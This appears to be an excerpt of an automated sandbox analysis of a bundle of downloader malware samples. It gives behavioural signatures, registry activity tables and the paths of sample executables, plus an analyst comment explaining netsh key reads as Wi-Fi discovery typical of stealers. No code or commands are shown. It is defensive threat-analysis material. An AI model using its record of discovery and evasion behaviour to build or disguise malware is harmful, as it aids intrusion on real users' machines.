Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
5 matches (no indicator, process or target recorded)
Embeds OpenSSL
1 match (no indicator, process or target recorded)
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened (4 times) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried (4 times) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated (4 times) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
These are reads only: netsh.exe enumerates this key on every launch to load its registered helper DLLs, so the signature fires whenever netsh is run (here consistent with the Wi-Fi Discovery signature, which stealers implement by calling netsh). Helper-DLL persistence would show a value being set under this key, which the report does not record.
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3076928777.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133786810330824482" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "968" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "260" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "1556" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "327" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\system32\BackgroundTransferHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).x = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).y = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c31c8bd7af18db019ca068d0c318db01331211f7644edb0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "417" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "9" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "2145" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "901" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
